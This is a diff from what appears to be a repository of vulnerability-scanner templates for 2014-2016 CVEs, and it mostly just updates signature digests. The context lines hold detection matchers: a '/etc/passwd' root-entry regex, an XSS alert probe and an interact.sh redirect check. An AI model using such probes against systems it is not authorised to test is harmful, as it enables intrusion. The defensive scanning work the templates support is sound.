b/http/cves/2014/CVE-2014-4210.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b52e22b2b25abe5a19f721f332e8bf75bada2eb3d19c315bf4bcae42f83438c702206adca2c25b6c0ea47b913fdf0f2fc8b7c8d803f4a2f7dd210e6fe66dea2b7a4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201a63eab7b54366342f1b6a8a82ef216a6edc6d8c9a6795c72c0a0ce05f550ef6022100cf1749334747c537d68a8de0b2f3776daa8470c99898c000e40a52baf65817a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index 32eb83f5e9..236ee0ab9e 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c70973326dc4da5c4130c3180aa50e32ccedebe17dfc3e2135ce622c7d93307b022029ca8cebdadfded9c3a554c78cf22248ac02a412d228fa50c9063bc9be53c4bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c1f86d3ec7d2e6dfb36bac1a7e60ca7b6da6c8baa6adb4f718027338d1740c15022100ed08ccc5e4520863607f6efbb5f4a404313db14d9555c38335514b6e415e2127:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index 788487855f..b4341d4c90 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c947aed3c99938dc952b322d6f2b1729438092660b31ff1c90783264a24cb01a0220265888536b4943a2204bc4141bffa43c67384e2b3be7f962cbf86d397dde8d17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022019cf3e791bbae0f3f2e1eb697da72e6a37013d18a36e3798631582753c15668302206547f6bb88ad146e68edea57b590269baaa8acd02b511b984549cb0a27577867:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index 6f55fe70fd..9fa5ec7540 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204f574903d83a5801ef1d9545beaaa47d7c0488d0f6557a301e114d7b8bb6943902204dffab422339ed830bd7129f4941e1f0e386dce61aa3fee7d5c6e576a400d675:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205aa37dff36e99fa14fe63b36c5d0ef979d821d46b43121abc1e3e3ccdcf64566022100fd478a8bc9605330f494e6d18a8618953dde211c346e17e043c0688e346066c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index 55155f129a..8c3f42d92f 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009a3a6da10e2646e323b0e1402df5a0a8f1f7f1bd7f360285e9ce6c860044ee4f022100ed819ebc2215ceb117a336038a31b1e1403f039b09870e097bcde02e57e05aea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022023db777acbf598abe093c11f43fad259d6521602433ae7f60f8beb0976312ac5022071aca9c91f38217e6ec63147c4de56c462ad92ef280921285b2f019a6e7367ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml index b44eafeb60..a884662c26 100644 --- a/http/cves/2014/CVE-2014-4544.yaml +++ b/http/cves/2014/CVE-2014-4544.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201b012a51490d4c5d00cbed0728997b52b855ebf28d0bc90d673677e88eda9db4022100d96a4915d878a3c91ec2e3a7fc2baa07140914b1c5549999e941d5e0d9beae3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203b9e90974629c38dc7ba24b6c065893128fb49899c54b1d432a9354d6bf979f1022069e559bb2ed3a7b79110890ab03412a524f3603138b600753467d200c26c1f29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index acd2614a2e..d175541783 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202d3cefb43338cd1d7fdec604f7e6f35630a7efd4c31ced1daf4d5d06bda5fbf3022100bd9e9e1c3b3766f433b39af8bb873b97144e038899c49bd8bae8a4cfdc884985:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f091ab784d25a99ca8add1132fc9a271ed1a7ab4144f8d6a56e575874cac7a920220291c6b38c1874086be3f44800218095439c6cf99598a330979ae8633866a0bdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index e71bb8dce9..8a0098ac29 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207e22cdf6282c4a98b8dd936fe0b27f53880ba1510bcc2635b4ec310f92b090b8022100fa2e5048f8201cb3ff0c7107646d7d7ce231f377f9e085d0b676a185a3c2fa1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022064be5bc2bc27f5573229fb1e06d1b6fdaf546e848c1cf6b87b3e55b1634151b3022100cbb7ad6637c2fab9f331f6f521522a84081a888553c1b902d966ed0dc5087b5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index 7abbea3f83..a0a64e7e71 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e855f89287ebae2fedab76dbc205d7826f347f223499b7d29ca203da114980e0022100a9d104e9dfde8d776e11958351e829597e081afcab74bfae85f5388768d7a13d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b59be00dd3551a903cf72f6efd3a7fde9a73f0d886633f10aabd032ae3293d39022100a4b5280ea8d9f4565ce8a0b3fe00a59c4947a6ba70bf76492abf3437937dacae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-4592.yaml b/http/cves/2014/CVE-2014-4592.yaml index be10c4aaba..a649659273 100644 --- a/http/cves/2014/CVE-2014-4592.yaml +++ b/http/cves/2014/CVE-2014-4592.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a2bd4ee7dd4410fcf6088eb1ea98117e6cb1d07778ec987702193ec58f1a32d2022071f4dedaed29b1e6c680e09b1e91688a875574e60a2b29ceb986f8ee3ec5d2fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022077481966c450edd18ee9b5bd7cf27a6eb455f479a6b90d8599c0b11f7285f63d0221008d427a5a6faf2554c216e4025cb7c3a9a58217dbea37d4fc696acd9c44278f2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml index 2158f2d193..d3b0891311 100644 --- a/http/cves/2014/CVE-2014-5368.yaml +++ b/http/cves/2014/CVE-2014-5368.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d69ee1fd512ebb21e3ef12903964a91f9d7ada78be70bf55c71ec977f4900eb2022007f9bf1c552bd638825024917e8ce6ed2768429fc5db5f1f78eda30f4cf9bebe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210084f4f052d7c330fa7eb3b57ec97ceabf3446b9e799ef733dccbb4eed07a3b65e022100cad135da770e7c26f05d404874a0a22b5db7488fb5d53a5447dbbf8150c90d20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml index 267fcd7ff6..bd14905d05 100644 --- a/http/cves/2014/CVE-2014-6308.yaml +++ b/http/cves/2014/CVE-2014-6308.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b55ba5c5bc0603bce568d991022be9818e26de9699fdecf5a734aa850dc13200022042473693f82c1c425062e207b10679c75162af12660a60d0038719261ec111d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022037184abecbf001ce5de1e8b72c72ffeb6653bfe803843bfda016abc44b6ce7a8022036b233f55e5adb22001aee3fc3c9101e59c01f7cf52f2b2db4f38e1471a0d1d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index 1e7fbdb48c..1cab9ef267 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200f79db8dff76965b8f3ab5107b55776d293d39132096d384d82363a216e98fc2022100d76092c87bcc34cda20e601f4e6b01bfe01927bded785626ba5a85772fdfcfdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100919cc2d724473a5c04c9c70bad522097e47a5a26adbc29e027a8404b23519791022100ef992ab080a2ac23e8737c5108975f97aea532772b408c87575b8d5de806c845:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index 9431767733..74a8916d62 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f33fbedc30570d477f0ca3fdf865e0b9d6a89eb72953eab70581c1657322d4d802204db1cd868a9f5b6daafb09716cab8669f1539216ffc9af3df54e317613be7368:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220762eaa5f298ce4378195e2e07e6a0d2245d1d5543b50fe7abd046fd74c5d54aa0220378220d9a1520bd199eb97b657a064dd610c742cbc1098ca9a7ac1f1a2e6bdb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-9180.yaml b/http/cves/2014/CVE-2014-9180.yaml index 9c74b4b5e7..dd76b22a25 100644 --- a/http/cves/2014/CVE-2014-9180.yaml +++ b/http/cves/2014/CVE-2014-9180.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a004730450220547a737881ebbba547bf355be3f161d38a9bd2f10b8811e29f6958aef12c49ab022100ee951982cbbea4df817b3881a1db7a04abc9cb8ab64d195f5b7f9046ac6d99b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bd71e2691f09ef0003581882f237edd193e38974f3a5bb92f19f9bf1b08f63c9022100947d726d2f4e172db471b3baf8e19df63b096919885aa2168129ab9583efe4cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml index 075ca2c9f5..9f3154e95d 100644 --- a/http/cves/2015/CVE-2015-1503.yaml +++ b/http/cves/2015/CVE-2015-1503.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008d7b2c5ed672ef985ed540bfcbc7c4a97cf1f627eacd0da9ebe8a57297962be402210097c2112afd61ccd9846d28ee66036895ff0f555e75161377c5269319f214284e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f1b6cec92cc5cca66731a816986ddb746c97d46d6d9802824e3eba996852035702204cc6020916fea497fc2e85561d5acf00eeaede0d281dc4786316293e45cc00c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1635.yaml b/http/cves/2015/CVE-2015-1635.yaml index e7743b1edb..e257bd67b0 100644 --- a/http/cves/2015/CVE-2015-1635.yaml +++ b/http/cves/2015/CVE-2015-1635.yaml @@ -51,4 +51,4 @@ http: part: header words: - "Microsoft" -# digest: 4a0a00473045022100f63535ff8dd3b0fc92073a3509d0a0fd7a6b3c9d6ed1578186ee18018a502f600220255af0daf50f7a5e4cfb146a9ace9e26de91185c1c8a07724820caba72ac8ac3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220098bb1e7e16f1550e029d56486663dbfae1e69203999a8d8599b0639379267ca02207800afef5ec0001642d15fa91a241092955036e798a7946dd21c095aeefedef8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml index 320e3da092..46abefa068 100644 --- a/http/cves/2015/CVE-2015-1880.yaml +++ b/http/cves/2015/CVE-2015-1880.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207d3f317fe5b4820f58a1472f22755f24ea4913e7d04c71281acdc16a6ea4dcf102210096e6b0e040652e05835ce91e53d560d472493b09560c17536225a2f257146642:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c54ae32d29d47fa21ce8300d23ac02ba93e607a1068d192427093deeb6a4d7e202204ca42733daf0504457f36a6da2ec6d0fbce7eba1f337becbff74f1155ab410a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-20067.yaml b/http/cves/2015/CVE-2015-20067.yaml index 4b276bd3a4..fe51fb40bf 100644 --- a/http/cves/2015/CVE-2015-20067.yaml +++ b/http/cves/2015/CVE-2015-20067.yaml @@ -45,4 +45,4 @@ http: - 'contains(header, "text/xml")' - 'contains_all(body, "title","wp:author_id","wp:author_email")' condition: and -# digest: 4a0a00473045022100d4c3c8a7fdc18cc9462c2ff1355d9ed71c05410b6a47e49c34bf86bf83a0b2c202202a13e920f228d0071e72f33431c9108a38ddd87eb8cea4f84b92ea9147599a3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008f69e199c7ba96eff64038c8b2f6999fb61c5dd102291a04bea401c3df6eb41a022100aab06b2f86c3ffa190afc44f39e5b21a17da65caaeb89d37919f844c105eabe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml index 123d364661..947c860c18 100644 --- a/http/cves/2015/CVE-2015-2067.yaml +++ b/http/cves/2015/CVE-2015-2067.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210098c40f6c8c0649ca609f84e623426e75d8b4585cd3c8a8170af7ad182b173602022039dd4d44ad7c15033383f04ab8c95596af9694c2bd91a5d278cd8c0211408051:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201353ea7187a1f9c29751699fff1087525bba47f580ba3dd00f1b2452ed2e3979022100f18f15490a5ff61402b95bd4b23f40ae41ac30e76bae6c49bdb4a63b3159806a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml index 654b138e9e..e384e9d4ea 100644 --- a/http/cves/2015/CVE-2015-2068.yaml +++ b/http/cves/2015/CVE-2015-2068.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200083eadbbf1f9e019bcd0a93d62e9285ceb5146a095784729a2b8f360e882060022100e7722c672319e299e2e4eda6bbf7ee1e8442c9c123f63aee02d34ad2ea776cab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009d726a8c4ca8fa63005a0a480346dd8c428fb8fc1d9d9015a9b6d140e0ab7c73022039d9def8ad4d1f2504466366c3119bf4d261ca81f8f43d41557090180788167a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2794.yaml b/http/cves/2015/CVE-2015-2794.yaml index 82e71b65c9..5b543dc622 100644 --- a/http/cves/2015/CVE-2015-2794.yaml +++ b/http/cves/2015/CVE-2015-2794.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100963e0da7dc7d871a054737b37e18f3cf4a88a499d60ab976e55a64b8b71b8f4802210098e0935f4fae3fb4f2771f8a890b65875b19cb5f1008ca03c9ac6ee6deebce71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100df3600ba2b662af9e71b76d868f9a42f08b1f15c5b7881c53ba541c0388905dc02205da04ef1d20450af59dff15188a2f2d4fd774ffb9ec34ade645d109d07fa747b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml index 1251a69481..7c482eb771 100644 --- a/http/cves/2015/CVE-2015-2807.yaml +++ b/http/cves/2015/CVE-2015-2807.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c5797951db4ec653663bb177b671ce6f66942165295490dbbdcea4c5d0c25f10022061fa0df6b51773e3afe345347fb3bb08f52f14b403d27433a203ae7e0393fd32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008418d2714302c8bacc72c22070c5fe1bf5bc9dc6ac4cacb51866826fa4f200d1022100d8f0ccc1356d763c2f1fe636841bdbe79932f0635144a2ca3e028cb8a0fd2989:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3035.yaml b/http/cves/2015/CVE-2015-3035.yaml index 8ae12b1160..da6236be0d 100644 --- a/http/cves/2015/CVE-2015-3035.yaml +++ b/http/cves/2015/CVE-2015-3035.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205e258464980f4c82ff954b569b1571e3d4c3b8ddb3ee6b9a2fec1680b4fe1ffa022100c331064e024486730778150d8b5c22fe64d3cdb3a0956dd807a5170aee2769ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022046a782c5b020339f7a059f064d6426515d64f7d62c917034ecb45a081cab8904022100abaa398c02df6a5b7dfa75e475d0ae03d1ec70111da5524f8d79ee4ebf414d07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-3897.yaml b/http/cves/2015/CVE-2015-3897.yaml index e346766e9c..3d55b097b3 100644 --- a/http/cves/2015/CVE-2015-3897.yaml +++ b/http/cves/2015/CVE-2015-3897.yaml @@ -50,4 +50,4 @@ http: - type: regex regex: - "root:[x*]:0:0:" -# digest: 4b0a00483046022100811332ca629cdfca6539bfdc50c6dd662a8522787a0bac631ecd72efe29ffd1b022100a97dd795f5dc0cfa69a7ecc65c1707b84fdf96eba9cbaeacde39a1356bba27f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022006f2647ffb7ae5ad85523c66d30ff1d58ab95bd1625b4ffda762c5e8469a284d02204b701b13a6749a43c74cd44f8c83779fac26dff7f2aac6dc002e9b0879870667:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml index 86fc569bd0..1a82fdacfa 100644 --- a/http/cves/2015/CVE-2015-4063.yaml +++ b/http/cves/2015/CVE-2015-4063.yaml @@ -49,4 +49,4 @@ http: - 'status_code_2 == 200' - "contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'newstatpress')" condition: and -# digest: 4a0a00473045022100b0f2e30065dca077f71d175c0be5c923af94f47acfb9c5706268811d87855d9d0220589926117e2ba9dd25f96017a9e5ad2b082115c853eddbc7805ddf2ae30ab9b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204dcfbadcca5be302e9005c92913b307c97309c8e974acf2bdb99f4df9740f6ff022100802868c4ad97fb42dfac7d60809e03080f19074c6cba1131c3bd4e5da034414c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index c4ce2d34c6..2b056ab4ea 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220030c360d8dfa5d3d6f2131143759e7b592d9e41b96f1343fcca8b5f2d2476b4402204573c142f5c7903e321c0f6d209366a1659d0b19d23feb8610d7aa104af4f7d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b2bba005d286e24c95a6dfe796e8786b5c85cd27546075c7a065f17cdda0e812022100bf92e40b7701ce29e61ebadda71943ffdeba45f4eff6b0c653f0e01bf542ff88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4455.yaml b/http/cves/2015/CVE-2015-4455.yaml index 65298dc77b..c3bb4b15ba 100644 --- a/http/cves/2015/CVE-2015-4455.yaml +++ b/http/cves/2015/CVE-2015-4455.yaml @@ -68,4 +68,4 @@ http: - 'status_code_2 == 200' - 'contains(body_2, "uploaded_filename\":\"{{filename}}.jpg")' condition: and -# digest: 4a0a00473045022078ca2d70ae668cef1731fec1043351a5c346027f11a5db597e9f60a953f42a5a022100924427e22c3329c6e9badf1c9c69e97e8fca728ccfee6e73e656b4b388ab0df4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022067d4626f991b5320d154fca6def6dc21753ef35f5a0543c467bc488dbacf5566022054458f7ad78bf887b24f12116181f91e185b42ead7bc422d614c165d4df94783:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml index df3f64f1c3..2c756832d1 100644 --- a/http/cves/2015/CVE-2015-5469.yaml +++ b/http/cves/2015/CVE-2015-5469.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ff5f92a49920cd8381ad88a3856050db835c74ab7946be53e0a1a413f0b190290220332d02cd0e4a2dd43ebccfbf82bba432e28fe572daf36a85f1ef7e36420aa6c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022048cc4fa7612874c6f9e2d48af2bf0575e181a9c5eb92cf2fa06306b7c7456642022100ef4e98f54c19b8e110e0db69c9ddf3079244a53f0bb75c5d0b24394258071e7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml index 2d5badcfb8..aa7948a5d4 100644 --- a/http/cves/2015/CVE-2015-6920.yaml +++ b/http/cves/2015/CVE-2015-6920.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009cba36ff243cc2b1d9c4a151b396958b4caf82584c82cf9f9e9b6892d403cf6c022018312ae7e0cb0e95f6fbd1cb4d1062102feb8dfab9b1cf125d3da648ffdde45f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220679e230959445da2c5b25e9a11a7d1a88cb0720728a47b5efe39d7da17a0a141022011ad48075504ec6966d82627ca3f218ffe9c18eb1978544468361e40b1f43cf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7297.yaml b/http/cves/2015/CVE-2015-7297.yaml index 098d5904c1..716d3005f0 100644 --- a/http/cves/2015/CVE-2015-7297.yaml +++ b/http/cves/2015/CVE-2015-7297.yaml @@ -46,4 +46,4 @@ http: part: body words: - '{{md5({{num}})}}' -# digest: 4a0a0047304502207a3b55b62d3630083acd3ff5ac07b40b36072cd0f19057206fc1c857c76d09100221009f3084a270873f40433bd307963f6139d6ec53c5e9dbcded90a7b58260331e85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202a08577111f012e59c2108d9e51684c5329449907081587b4e4d76abd3406739022100dbd68ec0f6ae6c4a6f6109fd123ff073d882103a02608a2c05b2e034addebccb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index 3de57a882e..f816d5909a 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -71,4 +71,4 @@ http: - type: status status: - 500 -# digest: 490a00463044022043bd184feb21ca8bc16b4fb7147c866de4ff696bfb2bdf5302e819afd88c3b6e022075249fac1e933dd96947e253c5e4c1713687f62804c8e9c259b81bcbe2efc03f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009586281cda8b6b30a3742d50ebc330263f55df7b891fd1d02ea189b267c2403a0221008e8594bba5c76926ba07e236387ab3d906309db88b0ed9431aa1489fbe1c40cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index 0a43cd3c2a..f1c51d813c 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206715646176dfaf881abea22a771b13d7191ddac25404b6da18043e32debb045a02206fc7d62fa1245bb84aa68f06446b12741e7c57561bc65de2c4b3992b421ad1b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207194d253550542bd30658b6d67814f0dec74914b8d242d858c3a190ba89ddd220220690346796828449895bf7ee397e1db889b20c1341fe2d6114fd187007415a7a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index 39e49a1d8e..b84e83e5c3 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -43,4 +43,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a00483046022100e4cb1accc1f6aa60e3abe2a12e593d2018453a73db8d49cfd30df1a5acba3fe202210098b526e82020fb8a4e0d9d4c50a5a3d986ec9ccb5fd2b6e693561b4b66ed3bee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ea91c0071f8a0ccc0191cd604f4d6f7fc61b3b716b520e545eab69d12cf5af35022022850efd8fbff62c81974d60b1378d7a9d74992f707a28553b8bbf97fb590ab7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-8399.yaml b/http/cves/2015/CVE-2015-8399.yaml index fbce9c9e13..c16ee99210 100644 --- a/http/cves/2015/CVE-2015-8399.yaml +++ b/http/cves/2015/CVE-2015-8399.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ea5b816fa70ecf0f1f6be7d3ede507c9fe4a29dae7445d2887f0f4c66bfa8ffa022100f1b0fa913988d0efc69fc8cd0c2779c5ceaf150bf72aa859b66c02efd8f96c9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207f50cefa6f24f4fb1f07b3b229fb698234043c337386cfe67f50d6a60d86ca6302200a267245e74b46efeccd471d30ecb8fe04ff0729b0fa3e31158b34c33e71d3ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-9414.yaml b/http/cves/2015/CVE-2015-9414.yaml index fad286f9a3..81f8ac8354 100644 --- a/http/cves/2015/CVE-2015-9414.yaml +++ b/http/cves/2015/CVE-2015-9414.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e9ea14ccaf1cec6af62f525d294701a6819909cb884ac9d793d6ab8849904ac5022100d8914e7df61908a6243f8f7a41608d4e7f093bb148158e4c261d0e1e62d2ce17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f19e32c056cf1ae38bfd9ef28246641ecbf394bf72669bc5e21fd008fc0c186a02206adbdc945317c0425b1c31aa4028f57eb4325078f3c9523b4ecf7d4bd5dc532b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-0957.yaml b/http/cves/2016/CVE-2016-0957.yaml index 8f4d62034d..7e9a1e63d7 100644 --- a/http/cves/2016/CVE-2016-0957.yaml +++ b/http/cves/2016/CVE-2016-0957.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 